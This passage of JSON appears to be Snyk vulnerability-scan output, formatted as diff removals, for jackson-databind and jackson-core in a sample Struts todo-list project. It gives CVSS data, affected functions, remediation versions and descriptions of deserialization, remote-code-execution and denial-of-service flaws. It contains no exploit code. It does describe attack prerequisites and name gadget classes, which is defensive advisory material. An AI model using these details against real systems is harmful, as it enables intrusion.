}, - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N", - "cvssV3BaseScore": 6.8, - "modificationTime": "2024-03-11T09:51:21.774444Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:57:20.565013Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 10, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:46:43.143163Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 6.8, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:51:21.774444Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A malicious user could perform a SSRF attack via the `axis2-jaxws` gadget due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-14721`) is not identical to `CVE-2018-12018`, `CVE-2018-14719`, `CVE-2018-14720`, `CVE-2018-14722`,`CVE-2018-12023` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2097)\n", - "epssDetails": { - "percentile": "0.85710", - "probability": "0.01257", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-14721" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-9mxf-g3x6-wv74" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2018-10-11T17:25:40.161831Z", - "functions_new": [ - { - "version": [ - "[,2.9.7)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2018-07-27T17:24:46Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": 
"2018-10-11T17:24:39Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:21.774444Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72882", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Wuguixiong" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.3)", - "[2.7.0,2.7.9.5)", - "[2.8.0,2.8.11.3)", - "[2.9.0,2.9.8)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.3", - "2.7.9.5", - "2.8.11.3", - "2.9.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.0.0, 2.9.8)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2186", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8", - "title": "GitHub Release Tag" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:48:06.100058Z" - }, - { - 
"assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "cvssV3BaseScore": 7.3, - "modificationTime": "2024-03-11T09:51:22.043196Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:46.690019Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:06.100058Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.3, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:51:22.043196Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attacks due to not blocking the `jboss-common-core ` class from polymorphic deserialization.\r\n\r\n**Note** This vulnerability (`CVE-2018-19362`) is not identical to `CVE-2018-19360` and `CVE-2018-19361`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.8 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2186)\n- [GitHub Release Tag](https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8)\n", - "epssDetails": { - "percentile": "0.81590", - "probability": "0.00788", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-19362" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-c8hm-7hpq-7jhg" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2019-01-03T14:17:19.256477Z", - "functions_new": [ - { - "version": [ - "[2.0.0, 2.9.8)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-01-02T19:18:44Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": 
"com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2019-01-03T17:01:51Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:22.043196Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72883", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Wuguixiong" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.3)", - "[2.7.0,2.7.9.5)", - "[2.8.0,2.8.11.3)", - "[2.9.0,2.9.8)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.3", - "2.7.9.5", - "2.8.11.3", - "2.9.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.0.0, 2.9.8)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2186", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8", - "title": "GitHub Release Tag" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": 
"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:48:04.422288Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "cvssV3BaseScore": 7.3, - "modificationTime": "2024-03-11T09:48:34.457712Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:57:20.593938Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:04.422288Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.3, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:34.457712Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attacks due to not blocking the `axis2-transport-jms ` class from polymorphic deserialization.\r\n\r\n**Note** This vulnerability (`CVE-2018-19360`) is not identical to `CVE-2018-19362` and `CVE-2018-19361`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.8 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2186)\n- [GitHub Release Tag](https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8)\n", - "epssDetails": { - "percentile": "0.81590", - "probability": "0.00788", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-19360" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-f9hv-mg5h-xcw9" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2019-01-03T14:17:23.673097Z", - "functions_new": [ - { - "version": [ - "[2.0.0, 2.9.8)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-01-02T19:18:44Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": 
"com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2019-01-03T17:01:51Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:48:34.457712Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72884", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Wuguixiong" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.3)", - "[2.7.0,2.7.9.5)", - "[2.8.0,2.8.11.3)", - "[2.9.0,2.9.8)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.3", - "2.7.9.5", - "2.8.11.3", - "2.9.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.0.0, 2.9.8)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2186", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8", - "title": "GitHub Release Tag" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": 
"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:48:06.110184Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "cvssV3BaseScore": 7.3, - "modificationTime": "2024-03-11T09:51:22.091904Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:57:20.548577Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:06.110184Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.3, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:51:22.091904Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attacks due to not blocking the `axis2-transport-jms ` class from polymorphic deserialization.\r\n\r\n**Note** This vulnerability (`CVE-2018-19361`) is not identical to `CVE-2018-19362` and `CVE-2018-19360`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.8 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2186)\n- [GitHub Release Tag](https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8)\n", - "epssDetails": { - "percentile": "0.81590", - "probability": "0.00788", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-19361" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-mx9v-gmh4-mgqw" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2019-01-03T14:17:31.715185Z", - "functions_new": [ - { - "version": [ - "[2.0.0, 2.9.8)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-01-02T19:18:43Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": 
"com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2019-01-03T17:01:51Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:22.091904Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31519", - "title": "Denial of Service (DoS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "credit": [ - "Alessio Soldano" - ], - "semver": { - "vulnerable": [ - "[,2.8.6)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.8.6" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.3, - "functions": [ - { - "version": [ - "[,2.8.6)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/core/json/UTF8StreamJsonParser.java", - "className": "UTF8StreamJsonParser", - "functionName": "_reportInvalidToken" - } - }, - { - "version": [ - "[,2.8.6)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/core/json/ReaderBasedJsonParser.java", - "className": "ReaderBasedJsonParser", - "functionName": "_reportInvalidToken" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-core", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-core/pull/322", - "title": "GitHub PR" - }, - { - "url": "https://issues.jboss.org/browse/JBEAP-6316", - "title": "Jira Issue" - } - ], - "cvssDetails": [], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.3, - 
"cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:01.546686Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-core](https://github.com/FasterXML/jackson-core) is a Core Jackson abstractions, basic JSON streaming API implementation\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). If the REST endpoint consumes POST requests with JSON or XML data and data are invalid, the first unrecognized token is printed to server.log\r\n> If the first token is word of length 10MB, the whole word is printed. This is potentially dangerous and can be used to attack the server by filling the disk with logs.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. 
